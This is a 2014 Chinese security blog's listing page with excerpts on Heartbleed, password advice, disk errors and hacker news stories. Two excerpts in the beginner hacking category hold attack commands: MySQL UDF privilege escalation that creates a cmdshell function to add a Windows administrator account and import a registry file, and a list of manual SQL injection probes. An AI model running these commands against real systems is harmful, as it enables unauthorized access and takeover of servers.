• “心脏出血”证实波及手机 安天推出检测插件

    “心脏出血”证实波及手机 安天推出检测插件
      OpenSSL“心脏出血”漏洞的严重性远比想象的严重。一些用户没有考虑到,手机上大量应用也需要账号登录,其登录服务也有很多是OpenSSL搭建的,因此在漏洞没有修补好之前,用手机登录过网银、网购等重要账号极容易导致用户账户信息丢失。需要在漏洞修补后及时更改密码。   安天旗下AVL移动安全团队在“漏洞”消息爆出后,迅速对主流的网银、网购、证券、航旅软件的登录入口...阅读全文
    作者:qxz_xp | 发布:2014年4月11日 | 分类:漏洞公布, 网络安全 | 1条评论
    阅读全文

  • OpenSSL漏洞转攻个人电脑 360首推修复方案

    OpenSSL漏洞转攻个人电脑 360首推修复方案
             OpenSSL“心脏出血”漏洞危害辐射范围正在不断扩大。在思科、Juniper网络设备被曝受此漏洞影响后,Windows上大批软件也被发现存在漏洞,可被黑客利用攻击网民电脑,抓取密钥等隐私数据,而攻击代码已在国外技术网站GitHub上公开。对此360安全卫士于10日晚间紧急推出漏洞修复方案,是目前唯一可预防此漏洞的PC安全软件。  “心脏出血”漏洞刚刚曝出时,黑客主要攻击的...阅读全文
    作者:qxz_xp | 发布:2014年4月11日 | 分类:漏洞公布, 网络安全 | 2条评论
    阅读全文

  • “心脏出血”:你需要尽快更改这些密码

    “心脏出血”:你需要尽快更改这些密码
    “Heartbleed”是什么?“心脏出血”漏洞,OpenSSL有史以来最具灾难性的一个漏洞,可能已经被发现和利用2年之久,前几天才公布,过多的不介绍了,知道严重性就行。 这个漏洞将影响所有使用https加密协议的网站和服务,包括且不仅包括Gmail和Facebook——这些网站可能已经被恶意人士监听,从而获取到你的重要信息,包括且不仅包括账号、密码、信用卡号密码等。 我们也不知道究竟有...阅读全文
    作者:qxz_xp | 发布:2014年4月11日 | 分类:安全知识, 漏洞公布, 网络安全 | 暂无评论
    阅读全文

  • mysql提权方法总结四则

    mysql提权方法总结四则
    一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: create function cmdshell returns string soname ’udf.dll’  select cmdshell(’net user iis_user /add’);  select cmdshell(’net localgroup administrators iis_user /add’);  select cmdshell(’regedit /s d:\web\3389.reg’);  drop function cmdshell;  select cmdshell(’netstat -an’); 二 ...阅读全文
    作者:qxz_xp | 发布:2014年4月06日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 手工注入命令总汇

    手工注入命令总汇
    1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ”=’ 4.搜索时没过滤参数的’and [查询条件] and ‘%25’=’ 5.判断数据库系统  ;and (select count(*) from sysobjects)>0 mssql  ;and (select count(*) from msysobjects)>0 access 6.猜数据库;and (select Co...阅读全文
    作者:qxz_xp | 发布:2014年4月01日 | 分类:菜鸟入门, 黑客攻防 | 1条评论
    阅读全文

  • 电脑硬盘故障提示信息详细说明

    电脑硬盘故障提示信息详细说明
    一 硬盘故障提示信息的含义   (1)Date error(数据错误)   从软盘或硬盘上读取的数据存在不可修复错误,磁盘上有坏扇区和   坏的文件分配表。   (2)Hard disk configuration error(硬盘配置错误)   硬盘配置不正确,跳线不对,硬盘参数设置不正确等。   (3)Hard disk controller failure(硬盘控制器失效)   控制器卡(多功能卡)松动,连线不对,...阅读全文
    作者:qxz_xp | 发布:2014年4月01日 | 分类:其它技术, 电脑维修 | 暂无评论
    阅读全文

  • 黑客传说:他差点儿堵了周鸿祎的发家路

    黑客传说:他差点儿堵了周鸿祎的发家路
    他是全球发现苹果漏洞最多的人 他曾穷的住在小黑屋 他经常接到国家安全部门的电话 他差点堵住周鸿祎的路 无名英雄 我们最终还是没有见到吴石本人,即便他的生意合伙人刘盛(化名)已经应承了帮我们牵线。自打 2010 年他接受了《福布斯》的专访之后,这个四川男人就再也不愿意让自己曝光。 那篇文章其实还算中肯,“在上月的一次安全更新中,苹果针对 iPhone 操作系统发布...阅读全文
    作者:qxz_xp | 发布:2014年3月26日 | 分类:业界新闻, 黑客攻防 | 2条评论
    阅读全文

  • 无需工具秒破网页上的星号密码(代码法)

    无需工具秒破网页上的星号密码(代码法)
    浏览器会记住你输入的密码本来没有什么好怕的,但是人天生就是懒的,“记住密码”用多了也就直接导致了你记不住密码了。虽然在网页中记住密码功能大部分调用 cookies 或者是储存在浏览器记录中,并且有大量的类似软件可以读取其中的密码,但是感觉很不安全和方便,如果用软件你并不能够保证软件有没有后门,如果自己去找 cookies 进行密码的找回 cookies 又大多加密或者很难找...阅读全文
    作者:qxz_xp | 发布:2014年3月25日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 网络专家呼吁警惕黑客借马航消息传播电脑病毒

    网络专家呼吁警惕黑客借马航消息传播电脑病毒
    【环球网综合报道】马航MH370航班的消息近日是人们关注的焦点,许多人通过网络了解调查的最新动向。据马来西亚《光明日报》3月18日报道,有网络专家警告,在社交网上大量出现的马航客机的“惊人”消息,都是黑客发出的陷阱。 据报道,这些虚假的新闻都以“发现失踪MH370”来吸引用户眼球,如“50名乘客在海上获救”、“飞机在百慕达三角被发现”等,消息链接中藏有计算机病毒,用户...阅读全文
    作者:qxz_xp | 发布:2014年3月19日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • Google Play遭遇黑客攻击 系统两次崩溃

    Google Play遭遇黑客攻击 系统两次崩溃
    近日,一名黑客攻击了Google Play的应用程序发布系统,导致该系统被封锁,不能上传和更新应用程序。 周一,一名黑客攻击了Google Play(谷歌商店)的应用程序发布系统,导致该系统被封锁,不能上传和更新应用程序。 这是一个许多用户可能没有注意到运行故障,除非用户发现自己突然无法更新《糖果粉碎传奇》(Candy Crush)或者《植物大战僵尸》(Plants v. Zombies)等游戏。但谷...阅读全文
    作者:qxz_xp | 发布:2014年3月19日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • 女神Wi-Fi被攻破 从此隐私是路人?

    女神Wi-Fi被攻破 从此隐私是路人?
    女神Wi-Fi被攻破 从此隐私是路人? 专家说实话:不是不黑你 只是你不值 近日,网络上盛传黑客自述的故事:黑客破解了邻家“女神”Wi-Fi的密码,她的微信、微博、QQ,甚至电视上的外接设备,都暴露在黑客眼里。黑客真能做到这一步吗?“女神”又该如何防范呢? 是否普通人使用黑客软件也能轻易破解Wi-Fi密码呢?复旦大学计算机科学技术学院的叶工告诉本报记者,首先,如果对方是...阅读全文
    作者:qxz_xp | 发布:2014年3月19日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • 攻下隔壁女生路由器后,我都做了些什么

    攻下隔壁女生路由器后,我都做了些什么
    其实这个问题可以理解为:蹭网之后,能做些什么? 不少人的八卦心窥探欲还是很强烈的,强烈到让人恐惧。所以很多人喜欢看一些八卦文章,比如:如何优雅的窥探别人? 通常这样的文章很容易火起来,因为不少人都喜欢看而且百看不厌。 最近路由安全沸沸扬扬,可以翻阅我微信公众号历史文章查看关于路由安全的文章以及央视当时的采访。鉴于天时地利人和,最后我成功的在现实生...阅读全文
    作者:qxz_xp | 发布:2014年3月18日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文